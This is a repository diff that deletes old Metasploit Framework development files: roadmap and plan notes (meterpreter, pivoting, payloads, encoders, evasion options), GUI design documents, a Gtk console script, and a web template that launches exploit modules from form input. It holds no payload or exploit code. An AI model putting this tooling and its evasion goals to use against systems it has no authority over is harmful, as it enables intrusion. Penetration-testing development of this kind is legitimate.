- sockets and protocols register subsystems
- sockets to take passed evasion level in precedence over subsystem/global
- consider http evasion
- random headers
- consider EvasionLevel advanced option on all exploits
misc
- session sharing through multiplexing
recon
- track exploit success, failure, host information
- support searching the knowledge base

35
dev/msf3/overview.txt
View File

@ -1,35 +0,0 @@
<b>Scheduled alpha preview release:</b> December 15th, 2005<br/>
<br/>
Metasploit 3.0 is the next generation of the Metasploit Framework. It is written
in the <a href="http://www.ruby-lang.org/">Ruby</a> programming language.
As it stands, the 2.0 branch has made it possible to drastically reduce the
amount of time it takes to implement an exploit with the added benefit of making
it possible to re-use large amounts of code between various exploits. The
extensible model through which payloads, encoders, NOP generators, and exploits
can be integrated has made it possible to use the Metasploit Framework as an
outlet for cutting-edge exploitation research.<br/>
<br/>
In this light, the 3.0 version is being planned to help continue to evolve
the field of exploitation research and exploitation frameworks in general.
The primary goals of the 3.0 version are listed below:<br/>
<ul>
<li>To improve automation of exploitation through scripting
<li>To simplify the process of writing an exploit
<li>To increase code re-use between exploits
<li>To improve and generically integrate evasion techniques
<li>To support automated network discovery and event correlation through <i>recon</i> modules
<li>To continue to provide a friendly outlet to cutting edge exploitation technology
</ul>
As we get closer to the preview release date, we will begin posting design
documentation and other information that will allow the community to assess
the new architecture and provide feedback. The preview release will simply
be used as a milestone by which the public can help us to gauge how much
work remains until we feel comfortable that we have a finished product.<br/>
<br/>
In the meantime, here are some screenshots of the 3.0 release in development. Nothing
too fancy at this point, but it highlights some of the upcoming changes.<br/>
<br/>
<a href="http://www.hick.org/~mmiller/msf3/pics">Metasploit 3.0 Preview Screenshots</a>
<br/>
<br/>
- Metasploit Staff

130
dev/msf3/plan.txt
View File

@ -1,130 +0,0 @@
The following things are required for the December alpha release:
- rex
X - post-exploitation
X - meterpreter
X - pivoting
X - portfwd command
- networking
X - switch board routing table for pivoting
X - meterpreter 'comm' support
- proxy 'comm' support
- asm
- block dependencies (req'd for shikata)
- block permutation generation (req'd for shikata)
X - text
X - create_pattern, pattern_offset
X - base64
X - consider extending String
X - logging
X - debug level limiter
X - define log levels, when they should be used, etc
- framework-core
X - modules
X - reloading
X - compatibility filtering (keys)
X - description sanitation (strip lines/etc)
X - payloads
X - meta information
X - stager/stage calling conventions
X - stack requirements
X - make payload prepend target specific
X - sessions
X - logging session activity
- module load caching
- switch to demand loaded modules rather than always loading
- should make things faster
X - recon
X - add a method like 'can_be_used' that checks whether or not dependencies are
X on the machine (like nmap) for a given module
- framework task queuing
- make the framework expose methods for queuing tasks (FrameworkTask)
- generic interface with an execute method
- called from within the context of a worker thread
- modules needing ports (above other modules)
- encoders
- shikata
X - nops
X - opty2
- payloads
- cmd payloads
X - mac os x payloads
- osx null free reverse stager
X - solaris payloads
X - bsd payloads
- user interfaces
- general
X - add concept of EVASION option (high, normal, low)
X - logging improvements
X - provide log file setting interface
X - log by default in the LogDir
X - msfcli
- msfweb
X - msfpayload
X - msfencode
- msfconsole
- spawn web-server from within msfconsole (msfweb instance)
- irb mode
- running 'msf scripts'
- testing framework
- framework core
X - handlers
- framework modules
- exploits
- payloads
X - encoders
- osx encoders
- nops
- recon
- framework sessions
- shell
- meterpreter
- documentation
- rex
- framework-core
- framework-base
- module interfaces
The following things should be implemented both as protocols and as exploit
mixins to encourage code re-use:
X - ftp
- backup agent protocols
- CA brightstor
X - Arkeia
X - mssql
- sunrpc
- xdr
- jbase
- oracle
Things that would be useful to have completed, but not a requirement:
- rex
- exploitation
- format string generator
- opcodedb client (return addr pooling)
- networking
- msfd 'comm' support
- modules
- payloads
- implement 'reliable' stagers with a higher rating so that
if there is enough room, reliable stagers can be used
- recon
X - basic range/port scanner
X - basic service identifier
- basic OS fingerprinting
- framework-core
- handler sharing
- exploits using the same payload/handler can share (ref count)
- plugin modules
- plugin modules can extend the framework and provide new features
X - framework-base
X - event correlation
X - recon events correlations
- user interfaces
- msfd
- daemon interface, provides command line interaction and proxying
- support authentication
- support SSL

8
dev/msf3/ported
View File

@ -1,8 +0,0 @@
This file contains the list of exploits ported so far and their status:
Ported
======
aim_goaway: Needs more testing, but hit on Windows XPSP0
ie_objecttype: Slightly unstable, needs more testing, but functioning
msrpc_dcom_ms03_026: re-exploitation fails, but otherwise working

16
dev/msf3/ruby.nono
View File

@ -1,16 +0,0 @@
Things to *not* do in ruby that will break ruby threads. This list
isn't complete, but it's things I've noticed while working on stuff:
- select with no timeout
This will make a blocking select call that will block all other
threads.
Use Rex::ThreadSafe::select
- use sleep
This will block all threads.
Use Rex::ThreadSafe::sleep (we've now wrapped the global sleep to
call the rex sleep)

14
dev/msf3/vars
View File

@ -1,14 +0,0 @@
DynamicSehRecord
- causes an exploit to generate a dynamic seh frame if it's an seh exploit
global
======
SessionLogging (true/yes/1)
- enables logging of sessions
ConsoleLogging (true/yes/1)
- enables logging of the console
DisableAutoSubscribe (true/yes/1)
- Disables the auto-subscription of modules to event provider interfaces.

48
dev/msfgui.txt
View File

@ -1,48 +0,0 @@
Metasploit Framework MsfGUI TODO List
=====================================
1 - Modify the signal-connect on the MyExploitTree class
On Gtk::TreeView of this class, remove "one shot", just make it "execute", dont ask for RHOST
the exploit shouldnt get listed in the One-Shot piece until its completed and running and it
should be removed once the exploit finishes.
=> DONE
2 - Built the MSFLog with a Gtk::TextView
the MSFLog needs to also contain the outpout of the exploits as they run
So redirect the output User picks exploit, goes straight to wizard, they click Go
exploit is added to the Targets list while its in running state
(for background exploits like WMF, this will stay there until you manually kill it)
when a new session is created, those are added automatically to the sessions list
and the output of the exploits are sent to the MSFLogs window.
Add some colours with tags
=> DONE
3 - bind a signal-connect to a running exploit
you can right click running exploits and kill them (this is technically a job)
(right click from Targets)
=> DONE
4 - session interaction
needs a wider console, some little buttons for sending '^C' and stuff
(maybe even a toggle for hex-mode)
so when youre typing on a command shell and need to send like ^D to close out 'cat'
also, sessions needs a right-click meny for 'Close'
and some way to detect when a session is dead and remove it from the list
ie. you type "exit" on the shell
=> Partially done
5 - Preferences page
Ton of stuff like binding all Databases stuff or adding preselected payloads user
6 - Exploit research
I think there's a way to perform this feature :
- register all child iters from the parent modules (Standart, Payloads, Encoders, ...) to an array
- add a Gtk::Entry beside the TreeView or bind a Gtk::Dialog to a right click _Search
- Once, the research return true, jump to the selected iter and perform the usual view
=> DONE
7 - the msfconsole
A fun feature will be to plug the msfconsole to :
the Gtk::NoteBook page or/and a dedicated windows/dialog

86
dev/msfgui/irb-gtk2.rb
View File

@ -1,86 +0,0 @@
#!/usr/bin/env ruby
#
# This is a basic irb interface using the Gtk2 GUI library
#
msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__
$:.unshift(File.join(File.dirname(msfbase), 'lib'))
require 'gtk2'
require 'irb'
require 'rex'
class Console < Gtk::Window
require 'rex/io/bidirectional_pipe'
@@offset = 0
def initialize
super()
# Layout stuff
set_default_size(500, 400)
set_border_width(10)
# Skeleton ;-)
vbox = Gtk::VBox.new(false, 5)
add(vbox)
@buffer = Gtk::TextBuffer.new
@textview = Gtk::TextView.new(@buffer)
scrolled_window = Gtk::ScrolledWindow.new
scrolled_window.add(@textview)
vbox.pack_start(scrolled_window, true, true, 5)
scrolled_window.set_policy(Gtk::POLICY_AUTOMATIC, Gtk::POLICY_AUTOMATIC)
signal_connect('destroy') do
Gtk.main_quit
end
signal_connect('key_press_event') do |edit, event|
if event.keyval == Gdk::Keyval::GDK_Return
catch_text
end
end
# Create the pipe interface
@pipe = Rex::IO::BidirectionalPipe.new
# Start the session interaction
@t_run = Thread.new do
IRB.init_config(nil)
IRB.conf[:USE_READLINE] = false
IRB.init_error
irb = IRB::Irb.new(IRB::WorkSpace.new())
IRB.conf[:MAIN_CONTEXT] = irb.context
irb.eval_input
end
# Create a subscriber with a callback for the UI
@sid = @pipe.create_subscriber_proc() do |data|
@buffer.insert(@buffer.end_iter, Rex::Text.to_utf8(data))
@buffer.move_mark('end_mark', @buffer.end_iter)
@textview.scroll_mark_onscreen(@buffer.get_mark('end_mark'))
end
show_all
end
def put_text(text = nil)
puts text if text
end
def catch_text
start = @buffer.get_iter_at_offset(@@offset)
puts @buffer.get_text(nil, @buffer.end_iter)
@buffer.insert(@buffer.end_iter,"\n")
if (not @buffer.get_mark('end_mark'))
@buffer.create_mark('end_mark', @buffer.end_iter, false)
end
@@offset = @buffer.end_iter.offset
end
end
Console.new
Gtk.main

6
dev/msfgui/testgtk.rb
View File

@ -1,6 +0,0 @@
#!/usr/bin/env ruby
require 'gtk2'
puts "Gtk+ v#{Gtk::MAJOR_VERSION}.#{Gtk::MINOR_VERSION}.#{Gtk::MICRO_VERSION}"
puts "Ruby/GTK2 v#{Gtk::BINDING_VERSION.join(".")}"

122
dev/msfwx.txt
View File

@ -1,122 +0,0 @@
Metasploit Framework Wx GUI Design Document
============================================
Code Layout
===========
The 'msfwx' executable must be a wrapper around a Msf::UI class. The
current code uses Msf::Ui::Wx::Driver as the backend.
The Driver must implement a constructor (initialize) that creates a
framework instance and intializes the UI code.
The Driver must implement a method called 'run' which actually starts
the GUI.
The actual GUI code should be stored in the lib/msf/ui/wx directory.
The Driver is responsible for loading any dependent UI code.
Wx uses the concept of an 'App' which has one or more 'Frames'.
The App should create the main Frame and configure the Menus.
The Frame should create all UI widgets, some of which can be
defined and loaded from other files.
The event processing code can be placed into frame.rb, or loaded from
another file, preferably separated out by functionality. The current
code does a rather poor job of separating GUI layout from the actual
processing code.
All constants should be placed into constants.rb in the lib/msf/ui/wx
directory.
These are basic guidelines - if something doesn't make sense, feel free
to change it.
GUI Features
============
The Wx GUI should support for the following basic features:
- List each module type and be able to filter based on search criteria
- Display information about any selected module, session, or job.
- Provide a tree view of all current hosts and all information about
each detected host. The user should be able to modify and add items
to the tree and apply modules to specific hosts and services in the
tree view.
- List each active session (a successful exploitation result) and give
the user the ability to interact with that session. I recommend using
the current Sessions tab and listing each session in a treeview. When
the user selects a session and double clicks, a new window will appear
that gives them the ability to interact with the session. When the
session interaction window is closed, the session should stay alive.
The user should be able to terminate the session by selecting it from
the list and hitting Delete or right clicking and using a pop-up menu.
In msfconsole, the session command is used to manage these.
- List each active 'job'. A job is an exploit or auxiliary module that
runs in the background. These modules can continue to produce data
and sessions while the user does other things. Examples of passive
exploits that create jobs are the browser exploits in:
modules/exploits/windows/browser/
In msfconsole, the job command is used to manage these.
- Provide a way to configure and execute a selected, non-exploit/auxiliary
module:
a) Provide the ability to generate shellcode from a Payload
b) Provide the ability to encode shellcode with an Encoder
c) Provide the ability to generate nop sleds with a Nop
- Provide a way to configure and execute an exploit or auxiliary module
a) Auxiliary modules will update the host information tree
b) Exploit 'check' functions will update the host information tree
c) Exploits can have their target system manualyl specified or selected
from the host information tree. Selecting a host node will fill in
the RHOST variable (if its supported) and selecting a service node
under a host will fill in the RPORT variable if its supported.
GUI Layout
==========
The GUI is divided into three distinct areas. On the left hand side we have
a set of tabs, each of which contains a list of things. This is where exploits,
sessions, jobs, payloads, and encoders live. The current msfwx code should
give you an idea of what I mean by this.
The bottom section can be used to display information about the currently
selected item (Information), the current debug log (output of print_status())
from inside modules, results of exploit execution, other standard 'console'
output, a mini-msfconsole that allows a subset of the normal commands to be used
and provides shortcuts for manipulating GUI elements (remove all sessions,
stop all jobs, run this exploit on all hosts, etc),
The right panel of the interface will contain the list of hosts in a tree view,
each host will also have a list of services, information entries, and other
data collected and reported by the other modules.
When a module is selected, a screen needs to be provided to configure the module
and start the execution. I have three ideas on this so far:
1) Make the right side consist of two tabs - one which has the host information
and another which is used to show module exploits and launch the actual module.
The thing that sucks about this is that if you want to see the host list while
you configure the module, you have to switch between the two tabs.
2) Make the module configuration a new dialog window that pops up. This is
the easier way and may end up being the cleanest way to implement this.
3) Move the list of hosts into the left-side tabs and then use the entire right
side to configure and launch the selected module.

311
dev/old_data_msfweb/exploits.rhtml
View File

@ -1,311 +0,0 @@
<%= Msf::Ui::Web::Common.header(framework.version, 'exploits') %>
<tr><td colspan='5'>
<%
name = query_string['name']
step = query_string['step'] || 0
target = query_string['target']
step = step.to_i
if (name == nil)
%>
<%# Display the exploit list if one hasn't been selected %>
<br/>
<div align='center' class='navHead'>
<table class='moduleList' width='100%' cellspacing='0' border='0'>
<% framework.exploits.each_module { |name, mod|
modinst = mod.new
%>
<tr>
<td class='moduleIcons' align='center'>
<%= Msf::Ui::Web::Common.module_icons(modinst) %>
</td>
<td class='moduleName'>
<a href="exploits.rhtml?name=<%= name %>"><%= modinst.name %></a>
</td>
<td class='moduleSpacer' colspan='2'>
</td>
</tr>
<% } %>
</table>
</div>
<%# Wizard step 0 - target selection %>
<%
elsif (step == 0)
modinst = framework.exploits.create(name)
%>
<br/>
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
<tr>
<td class='moduleName'>
<div class='textBold'><%= html_escape(modinst.name) %></div>
</td>
</tr>
</table>
<br/>
<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
<tr>
<td align='right' width='80' class='textBold'>Name:</td>
<td class='textNormal'><%= html_escape(modinst.name) %></td>
</tr>
<tr>
<td align='right' width='80' class='textBold'>Authors:</td>
<td class='textNormal'><%= html_escape(modinst.author.join("<br/>")) %></td>
</tr>
<tr>
<td align='right' width='80' class='textBold' valign='top'>Description:</td>
<td colspan='2' class='textNormal' valign='top'>
<%= html_escape(modinst.description) %>
</td>
</tr>
<tr>
<td align='right' width='80' class='textBold' valign='top'>References:</td>
<td colspan='2' class='textNormal' valign='top'>
<% modinst.references.each { |ref| %>
<% if (ref.kind_of?(Msf::Module::SiteReference)) %>
- <a href='<%= ref.site %>' target='_blank'><%= ref.to_s %></a><br/>
<% else %>
- <%= ref.to_s %><br/>
<% end %>
<% } %>
</td>
</tr>
<tr>
<td align='right' width='80' class='textBold'>Targets:</td>
<td class='textNormal'>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>
<table align='align' cellpadding='2' cellspacing='0' border='0'>
<tr>
<td class='textBold'>Target Name</td>
<td class='textBold'>Platform</td>
</tr>
<% modinst.targets.each_with_index { |tgt, idx| %>
<tr>
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
<%= idx %> - <a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= idx %>'><%= tgt.name %></a>
</td>
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
<%= Msf::Ui::Web::Common.target_icons(tgt) %>
</td>
</tr>
<% } %>
</table>
</td>
</tr>
</table>
<%# Wizard step 1 - payload selection %>
<%
elsif (step == 1)
modinst = framework.exploits.create(name)
modinst.datastore['TARGET'] = query_string['target'].to_i
%>
<br/>
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
<tr>
<td class='moduleName'>
<div class='textBold'><%= html_escape(modinst.name) %></div>
</td>
</tr>
</table>
<br/>
<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
<tr>
<td align='left' width='80' class='textBold'><nobr>Select Payload:</nobr></td>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td class='textBold'>Name</td>
<td class='textBold'>Description</td>
</tr>
<% idx = 0
modinst.compatible_payloads.each { |pname, pmod|
pmodinst = pmod.new
%>
<tr>
<td>&nbsp;</td>
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
<a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= target %>&payload=<%= pname %>'><%= html_escape(pname) %></a>
</td>
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'><%= html_escape(pmodinst.description) %></td>
</tr>
<% idx += 1
}
%>
</table>
<%# Wizard step 2 - option selection %>
<% elsif (step == 2)
payload = query_string['payload']
modinst = framework.exploits.create(name)
pinst = framework.payloads.create(payload)
modinst.datastore['TARGET'] = query_string['target'].to_i
%>
<br/>
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
<tr>
<td class='moduleName'>
<div class='textBold'><%= html_escape(modinst.name) %></div>
</td>
</tr>
</table>
<br/>
<form method='GET'>
<input type='hidden' name='eid' value="<%= Msf::Ui::Web::Driver::next_eid %>"/>
<input type='hidden' name='name' value="<%= html_escape(name) %>"/>
<input type='hidden' name='step' value="<%= step + 1 %>"/>
<input type='hidden' name='target' value="<%= html_escape(modinst.datastore['TARGET']) %>"/>
<input type='hidden' name='payload' value="<%= html_escape(payload) %>"/>
<table align='center' cellpadding='2' border='0' cellspacing='0' width='95%'>
<%
options = pinst.options.merge_sort(modinst.options)
options.each { |name, option|
next if (option.advanced?)
next if (option.evasion?)
%>
<tr>
<td class='textBold'><%= name %></td>
<td class='textBold'><%= (option.required?) ? "Required" : "Optional" %></td>
<td class='textNormal'><%= option.type %></td>
<td class='textNormal'>
<input type='text' name="opt_<%= html_escape(name) %>" value="<%= html_escape(option.default || '') %>"/>
</td>
<td class='textNormal'><%= html_escape(option.desc) %></td>
</tr>
<% } %>
<tr><td colspan='5'>&nbsp;</td></tr>
<tr>
<td colspan='3' class='textBold'>
Preferred Encoder:<br/>
<select name='encoder' size='1'>
<option value='__default'>Default
<% pinst.compatible_encoders.each { |encname, mod| %>
<option><%= encname %>
<% } %>
</select>
</td>
<td colspan='2' class='textBold'>
NOP Generator:<br/>
<select name='nop' size='1'>
<option value='__default'>Default
<% pinst.compatible_nops.each { |nopname, mod| %>
<option><%= nopname %>
<% } %>
</select>
</td>
</tr>
<tr><td colspan='5'>&nbsp;</td></tr>
<noscript>
<input type='hidden' name='nojs' value="1"/>
</noscript>
<tr>
<td colspan='3' align='right'>
<input type='submit' name='action' value='Check' class='button'/>
</td>
<td colspan='2' align='left'>
<input type='submit' name='action' value='Exploit' class='button'/>
</td>
</tr>
</table>
</form>
<%# Wizard step 3 - exploitation %>
<%
elsif (step == 3)
# Is JS disabled in the client's browser?
nojs = query_string['nojs'] == '1' ? true : false
# Create the exploit instance
modinst = framework.exploits.create(name)
# Set the encoder/nop to nil if it's not valid.
query_string['encoder'] = nil if (query_string['encoder'] == '__default')
query_string['nop'] = nil if (query_string['nop'] == '__default')
# Build the options string
options = ''
query_string.each_pair { |k, v|
next if v.nil? or v.length == 0
if k =~ /^opt_(.*)$/
options += "#{$1}=#{v} "
end
}
# Use buffered output by default
output = Rex::Ui::Text::Output::Buffer.new
# If we support javascript, then we'll use something better
if nojs == false
# TODO
end
# Whether or not we should run this as a job
as_job = modinst.passive? || (nojs == false)
# Kick off the exploit process
error = false
begin
modinst.exploit_simple(
'Encoder' => query_string['encoder'],
'Nop' => query_string['nop'],
'Payload' => query_string['payload'],
'Target' => query_string['target'].to_i,
'OptionStr' => options,
'LocalOutput' => output,
'LocalInput' => nil,
'RunAsJob' => as_job)
rescue
display = "<span style='font-weight: bold'><span style='color: red'>Error:</span>&nbsp;&nbsp;" + html_escape($!) + "</span>"
error = true
end
# Use the buffered output for display if we didn't fail.
if error == false
display = html_escape(output.buf).gsub(/\n/, "<br>")
if as_job
display += "<br/><br/><span style='font-weight: bold'>Exploit is now running in the background.</span>"
end
end
%>
<br/>
<span style='font-weight: bold'>
Launching exploit <%= modinst.refname %> ...
</span>
<br/><br/>
<%= display %>
<% else %>
Unknown step: <%= html_escape(step) %>
<% end %>
</td></tr>
<%= Msf::Ui::Web::Common.footer %>

BIN
dev/old_data_msfweb/favicon.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 326 B

BIN
dev/old_data_msfweb/images/aix.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 186 B

BIN
dev/old_data_msfweb/images/amiga.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 977 B

BIN
dev/old_data_msfweb/images/any.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 944 B

BIN
dev/old_data_msfweb/images/be.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 185 B

BIN
dev/old_data_msfweb/images/bsd.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 595 B

BIN
dev/old_data_msfweb/images/cisco.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 884 B

BIN
dev/old_data_msfweb/images/hpux.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 216 B

BIN
dev/old_data_msfweb/images/irix.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 197 B

BIN
dev/old_data_msfweb/images/linux.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 571 B

BIN
dev/old_data_msfweb/images/logo.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 65 KiB

BIN
dev/old_data_msfweb/images/novell.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 77 B

BIN
dev/old_data_msfweb/images/os2.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 155 B

BIN
dev/old_data_msfweb/images/osx.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 229 B

BIN
dev/old_data_msfweb/images/sun.gif
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 1.0 KiB

Some files were not shown because too many files have changed in this diff Show More